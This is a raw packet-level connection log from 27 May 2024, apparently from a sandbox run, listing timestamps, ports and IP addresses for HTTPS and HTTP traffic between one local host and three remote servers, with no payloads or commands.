May 27, 2024 18:35:39.439177990 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.439213991 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.439232111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.439246893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.490101099 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.490135908 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.490165949 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.490179062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.490190983 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.492383957 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.492412090 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.492450953 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.492461920 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.492474079 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.493304014 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.493335009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.493366957 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.493376017 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.493391991 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.493993044 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.494026899 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.494052887 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.494066000 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.494076967 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.495316982 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.495347977 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.495368004 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.495379925 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.495393038 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.495393038 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.496103048 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.496129990 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.496164083 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.496171951 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.496185064 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.510366917 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.510397911 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.510425091 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.510435104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.510449886 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.530004978 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.530042887 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.530080080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.530088902 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.530101061 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.580559015 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.580591917 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.580640078 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.580651045 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.580662966 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.583246946 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.583273888 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.583308935 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.583329916 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.583353996 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.583369017 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.583386898 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.587491989 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.587522030 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.587567091 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.587579012 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.587590933 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.588059902 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588090897 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588115931 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.588124037 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588146925 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.588573933 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588602066 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588625908 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.588634014 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.588646889 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.589188099 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.589219093 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.589242935 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.589251995 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.589265108 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.603188992 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.603219032 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.603276014 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.603290081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.603302002 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.621354103 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.621386051 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.621433020 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.621447086 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.621458054 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.675837994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.675868034 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.675928116 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.675960064 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676384926 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676417112 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676428080 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.676436901 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676446915 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676470995 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.676484108 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.676503897 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.678430080 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.678469896 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.678500891 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.678513050 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.678528070 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.681549072 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.681581974 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.681617022 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.681629896 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.681643009 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682337046 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.682365894 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.682380915 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682389021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.682404041 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682452917 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682492018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682492018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682492018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682492018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.682492018 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861190081 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861223936 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861262083 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861275911 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861298084 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861303091 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861318111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861335993 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861335993 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861341953 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861356974 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861367941 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861372948 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861381054 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861382008 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861391068 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861396074 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861401081 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861413002 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861423016 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861439943 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861452103 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861465931 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861465931 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861475945 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861488104 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861505032 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861511946 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861517906 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861524105 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861534119 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861546040 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861553907 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861572027 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861572027 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861579895 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861592054 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861593962 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861605883 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861619949 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861629963 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861641884 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861641884 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861669064 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861676931 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861687899 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861702919 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861713886 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861731052 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861749887 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861757994 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861774921 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861778021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861799955 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861808062 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861823082 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861824036 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861851931 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861871004 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861881971 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861895084 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861897945 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861897945 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861927986 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861941099 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861948967 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861960888 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.861977100 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861989975 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.861990929 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862004995 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862010956 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862041950 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862234116 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862268925 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862293005 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862301111 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862315893 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862349987 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862382889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862396955 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862416029 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862431049 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862700939 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862728119 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862750053 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862761974 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.862775087 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.862797976 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.863344908 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.863375902 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.863400936 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.863409042 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.863425016 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.864157915 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.864190102 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.864209890 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.864221096 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.864234924 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.864234924 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.865223885 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.891443014 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.891474009 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.891633987 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.891633987 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.891634941 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.891666889 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.894566059 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.894609928 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.894731998 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.894731998 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.894764900 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.948133945 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.948167086 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.948241949 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.948278904 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.948297977 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.949002028 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.951823950 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.951853991 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.951888084 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.951898098 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.951919079 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.952543974 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.952579021 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.952610016 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.952620029 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.952635050 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.953073025 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.953130960 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.953141928 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.953164101 CEST	443	49174	188.114.97.3	192.168.2.22
May 27, 2024 18:35:39.953207970 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.954543114 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:39.955261946 CEST	49174	443	192.168.2.22	188.114.97.3
May 27, 2024 18:35:44.384038925 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.389651060 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.389733076 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.389811993 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.398610115 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883718967 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883805990 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883842945 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883872032 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.883877993 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883908033 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883923054 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.883940935 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883974075 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.883982897 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.884007931 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.884042978 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.884052038 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.884079933 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.884124041 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.889029026 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.889106989 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.889141083 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.889161110 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.889410973 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.889440060 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.889453888 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.971545935 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.971621037 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.971628904 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.971637964 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.971679926 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.972053051 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972090006 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972105980 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972131968 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.972204924 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972249031 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.972609043 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972700119 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972714901 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972758055 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.972779989 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972795963 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.972821951 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.973135948 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.973181963 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.973191023 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.973206997 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.973244905 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.973332882 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.973356009 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.973418951 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.974104881 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.974139929 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.974155903 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.974188089 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.974277020 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.974298000 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.974324942 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.976541042 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.976583004 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:44.976597071 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.976617098 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:44.976658106 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:45.059149981 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059225082 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059278011 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059314013 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059324026 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:45.059350014 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059382915 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059420109 CEST	80	49175	198.46.177.156	192.168.2.22
May 27, 2024 18:35:45.059427977 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:35:45.131814003 CEST	49175	80	192.168.2.22	198.46.177.156
May 27, 2024 18:36:08.143594027 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:08.148814917 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:08.148886919 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:08.149095058 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:08.149127960 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:08.156058073 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:08.156116009 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.103879929 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.103980064 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104016066 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104033947 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.104079962 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104123116 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.104130983 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104165077 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104202986 CEST	80	49176	77.232.129.190	192.168.2.22
May 27, 2024 18:36:09.104209900 CEST	49176	80	192.168.2.22	77.232.129.190
May 27, 2024 18:36:09.104254961 CEST	80	49176	77.232.129.190	192.168.2.22
